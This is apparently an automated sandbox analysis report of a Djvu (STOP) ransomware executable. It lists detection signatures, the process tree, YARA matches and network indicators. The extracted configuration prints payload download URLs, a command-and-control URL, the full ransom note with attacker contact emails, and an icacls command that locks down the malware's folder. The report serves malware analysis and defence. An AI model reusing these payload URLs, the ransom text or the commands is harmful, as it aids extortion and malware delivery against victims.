Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Windows Analysis Report NZPC0PFaC0.exe

Overview

General Information

Sample Name:NZPC0PFaC0.exe
Analysis ID:496234
MD5:550b59b69ebfd6dda6b55725245b46ad
SHA1:f6a71793288cc09397b262fba8fc38b29073a44e
SHA256:0d977e55742460c71884d6040178fc8c7abf8c97136b6293da37cbf9c59b6778
Tags:exeRansomwareStopStop
Infos:

Most interesting Screenshot:

Detection

Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Found ransom note / readme
Yara detected Djvu Ransomware
Detected unpacking (changes PE section rights)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Injects a PE file into a foreign processes
Contains functionality to inject code into remote processes
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Extensive use of GetProcAddress (often used to hide API calls)
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses cacls to modify the permissions of files
Contains functionality to launch a program with higher privileges
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to query network adapater information
Creates a process in suspended mode (likely to inject code)

Classification

Process Tree

  • System is w10x64
  • NZPC0PFaC0.exe (PID: 4332 cmdline: 'C:\Users\user\Desktop\NZPC0PFaC0.exe' MD5: 550B59B69EBFD6DDA6B55725245B46AD)
    • NZPC0PFaC0.exe (PID: 752 cmdline: 'C:\Users\user\Desktop\NZPC0PFaC0.exe' MD5: 550B59B69EBFD6DDA6B55725245B46AD)
      • icacls.exe (PID: 6824 cmdline: icacls 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96' /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: FF0D1D4317A44C951240FAE75075D501)
      • NZPC0PFaC0.exe (PID: 5344 cmdline: 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask MD5: 550B59B69EBFD6DDA6B55725245B46AD)
        • NZPC0PFaC0.exe (PID: 7112 cmdline: 'C:\Users\user\Desktop\NZPC0PFaC0.exe' --Admin IsNotAutoStart IsNotTask MD5: 550B59B69EBFD6DDA6B55725245B46AD)
  • NZPC0PFaC0.exe (PID: 1376 cmdline: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task MD5: 550B59B69EBFD6DDA6B55725245B46AD)
    • NZPC0PFaC0.exe (PID: 5608 cmdline: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe --Task MD5: 550B59B69EBFD6DDA6B55725245B46AD)
  • NZPC0PFaC0.exe (PID: 4340 cmdline: 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart MD5: 550B59B69EBFD6DDA6B55725245B46AD)
    • NZPC0PFaC0.exe (PID: 6880 cmdline: 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart MD5: 550B59B69EBFD6DDA6B55725245B46AD)
  • NZPC0PFaC0.exe (PID: 1308 cmdline: 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart MD5: 550B59B69EBFD6DDA6B55725245B46AD)
    • NZPC0PFaC0.exe (PID: 7044 cmdline: 'C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exe' --AutoStart MD5: 550B59B69EBFD6DDA6B55725245B46AD)
  • cleanup

Malware Configuration

Threatname: Djvu

{"Download URLs": ["http://znpst.top/dl/build2.exe", "http://securebiz.org/files/1/build3.exe"], "C2 url": "http://securebiz.org/fhsgtsspen6/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-1JwFK5rT39\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nmanager@mailtemp.ch\r\n\r\nReserve e-mail address to contact us:\r\nsupporthelp@airmail.cc\r\n\r\nYour personal ID:\r\n0336gSd743d", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu57tFlgbtLAHOxlEyo7a\\\\n5EQX5BVCj\\/a01eBfOlLp1C\\/dUPKprRIvTRRYnjtkCN5uB0ni9m\\/GGY2R7dcZkBFE\\\\nFoYdHolqx1DzonNoGRf9FH126K9Djn\\/HJE1luOEKVS57yPCWDL4Nf2c1TVGhDLl7\\\\n2NmDGdmBBTlc92jSlZKpsKqIk++xsdGv6W05uMaqMEaSbW4oorrufOnex8zyxXIA\\\\nFltacJCoc2A2tbl7Ur\\/N2sp7ppeafCe9YT\\/TIYPosfgVT3FuFUQVimLFoxytPeOv\\\\nozAeLpTyyumQUfg0WY2cC+tum+9X\\/S+\\/2ED2iaR55NnI3yeLV5ACb5mqVIBsNUlq\\\\nkQIDAQAB\\\\n-----END PUBLIC KEY-----"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
  • 0xe23ea:$s1: http://
  • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
  • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
  • 0xe23ea:$f1: http://
0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
    • 0xe23ea:$s1: http://
    • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
    • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
    • 0xe23ea:$f1: http://
    00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      0000000D.00000002.348927479.0000000000400000.00000040.00000001.sdmpSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
      • 0xe23ea:$s1: http://
      • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
      • 0xe23ea:$f1: http://
      Click to see the 30 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      12.2.NZPC0PFaC0.exe.400000.0.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
      • 0xe23ea:$s1: http://
      • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
      • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
      • 0xe23ea:$f1: http://
      12.2.NZPC0PFaC0.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        8.2.NZPC0PFaC0.exe.7c15a0.1.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
        • 0xe0dea:$s1: http://
        • 0xfee98:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0xff528:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0xff54b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x10312b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
        • 0x101026:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
        • 0xe0dea:$f1: http://
        8.2.NZPC0PFaC0.exe.7c15a0.1.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          13.2.NZPC0PFaC0.exe.400000.0.raw.unpackSUSP_XORed_URL_in_EXEDetects an XORed URL in an executableFlorian Roth
          • 0xe23ea:$s1: http://
          • 0x100498:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x100b28:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x100b4b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x10472b:$s1: \xE8\xF4\xF4\xF0\xBA\xAF\xAF
          • 0x102626:$s2: \xE8\xF4\xF4\xF0\xF3\xBA\xAF\xAF
          • 0xe23ea:$f1: http://
          Click to see the 55 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 10.2.NZPC0PFaC0.exe.400000.0.unpackMalware Configuration Extractor: Djvu {"Download URLs": ["http://znpst.top/dl/build2.exe", "http://securebiz.org/files/1/build3.exe"], "C2 url": "http://securebiz.org/fhsgtsspen6/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-1JwFK5rT39\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nmanager@mailtemp.ch\r\n\r\nReserve e-mail address to contact us:\r\nsupporthelp@airmail.cc\r\n\r\nYour personal ID:\r\n0336gSd743d", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F
          Multi AV Scanner detection for submitted fileShow sources
          Source: NZPC0PFaC0.exeVirustotal: Detection: 35%Perma Link
          Source: NZPC0PFaC0.exeReversingLabs: Detection: 55%
          Multi AV Scanner detection for domain / URLShow sources
          Source: securebiz.orgVirustotal: Detection: 17%Perma Link
          Source: http://securebiz.org/fhsgtsspen6/get.phpVirustotal: Detection: 19%Perma Link
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeReversingLabs: Detection: 55%
          Machine Learning detection for sampleShow sources
          Source: NZPC0PFaC0.exeJoe Sandbox ML: detected
          Machine Learning detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,5_2_0040E870
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,5_2_0040EAA0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,5_2_00410FC0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,10_2_0040E870
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040EA51 CryptDestroyHash,CryptReleaseContext,10_2_0040EA51
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,10_2_0040EAA0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_0040EC68 CryptDestroyHash,CryptReleaseContext,10_2_0040EC68
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,10_2_00410FC0
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00411178 CryptDestroyHash,CryptReleaseContext,10_2_00411178
          Source: NZPC0PFaC0.exe, 00000010.00000002.555399079.00000000031BA000.00000004.00000010.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----

          Compliance:

          barindex
          Detected unpacking (overwrites its own PE header)Show sources
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeUnpacked PE file: 5.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeUnpacked PE file: 10.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 12.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 13.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeUnpacked PE file: 16.2.NZPC0PFaC0.exe.400000.0.unpack
          Source: NZPC0PFaC0.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, RELOCS_STRIPPED
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\5d8f6c6f-a1db-4962-b147-3af438dcbf96\NZPC0PFaC0.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49750 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49751 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49752 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49753 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 77.123.139.190:443 -> 192.168.2.3:49756 version: TLS 1.2
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb source: NZPC0PFaC0.exe, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp
          Source: Binary string: C:\lif-ved49-podacarofo-judisovuhola10.pdb source: NZPC0PFaC0.exe
          Source: Binary string: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdbI source: NZPC0PFaC0.exe, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmp
          Source: Binary string: cC:\lif-ved49-podacarofo-judisovuhola10.pdb source: NZPC0PFaC0.exe
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_00410160
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_2_0040F730 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_2_0040F730
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 5_1_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,5_1_00410160
          Source: C:\Users\user\Desktop\NZPC0PFaC0.exeCode function: 10_2_00410160 PathFindFileNameW,PathFindFileNameW,_memmove,PathFindFileNameW,_memmove,PathAppendW,_memmove,PathFileExistsW,_malloc,lstrcpyW,lstrcatW,_free,FindFirstFileW,PathFindExtensionW,_wcsstr,_wcsstr,FindNextFileW,FindClose,10_2_00410160

          Networking:

          barindex
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: http://securebiz.org/fhsgtsspen6/get.php
          Source: Joe Sandbox ViewASN Name: SKB-ASSKBroadbandCoLtdKR SKB-ASSKBroadbandCoLtdKR
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: Joe Sandbox ViewIP Address: 77.123.139.190 77.123.139.190
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
          Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
          Source: NZPC0PFaC0.exe, 00000010.00000003.376779367.0000000003500000.00000004.00000010.sdmpString found in binary or memory: URL=http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: NZPC0PFaC0.exe, 00000010.00000003.377098240.0000000003500000.00000004.00000010.sdmpString found in binary or memory: URL=http://www.twitter.com/ equals www.twitter.com (Twitter)
          Source: NZPC0PFaC0.exe, 00000010.00000003.377220530.0000000003500000.00000004.00000010.sdmpString found in binary or memory: URL=http://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: NZPC0PFaC0.exe, 0000000A.00000002.332855453.0000000000808000.00000004.00000020.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: NZPC0PFaC0.exe, 00000001.00000002.303261681.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000005.00000002.310073173.0000000000400000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000008.00000002.329001364.00000000007C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000009.00000002.344398408.0000000000840000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000A.00000001.328371406.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000B.00000002.345555445.00000000008C0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 0000000C.00000001.343177485.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000D.00000001.345040542.0000000000400000.00000040.00020000.sdmp, NZPC0PFaC0.exe, 0000000E.00000002.364511145.00000000008B0000.00000040.00000001.sdmp, NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://https://ns1.kriston.ugns2.chalekin.ugns3.unalelath.ugns4.andromath.ug/Error
          Source: NZPC0PFaC0.exe, 00000010.00000003.376736269.0000000003500000.00000004.00000010.sdmpString found in binary or memory: http://www.amazon.com/
          Source: NZPC0PFaC0.exe, 00000010.00000003.376800469.0000000003500000.00000004.00000010.sdmpString found in binary or memory: http://www.google.com/
          Source: NZPC0PFaC0.exe, 00000010.00000003.376822071.0000000003500000.00000004.00000010.sdmpString found in binary or memory: http://www.live.com/
          Source: NZPC0PFaC0.exe, 00000010.00000003.376954535.0000000003500000.00000004.00000010.sdmpString found in binary or memory: http://www.nytimes.com/
          Source: NZPC0PFaC0.exe, 00000010.00000001.363770530.0000000000400000.00000040.00020000.sdmpString found in binary or memory: http://www.openssl.org/support/faq.html
          Source: NZPC0PFaC0.exe, 00000010.00000003.377028462.0000000003500000.00000004.00000010.sdmpString found in binary or memory: http://www.reddit.com/
          Source: NZPC0PFaC0.exe, 00000010.00000003.377098240.0000000003500000.00000004.00000010.sdmpString found in binary or memory: http://www.twitter.com/
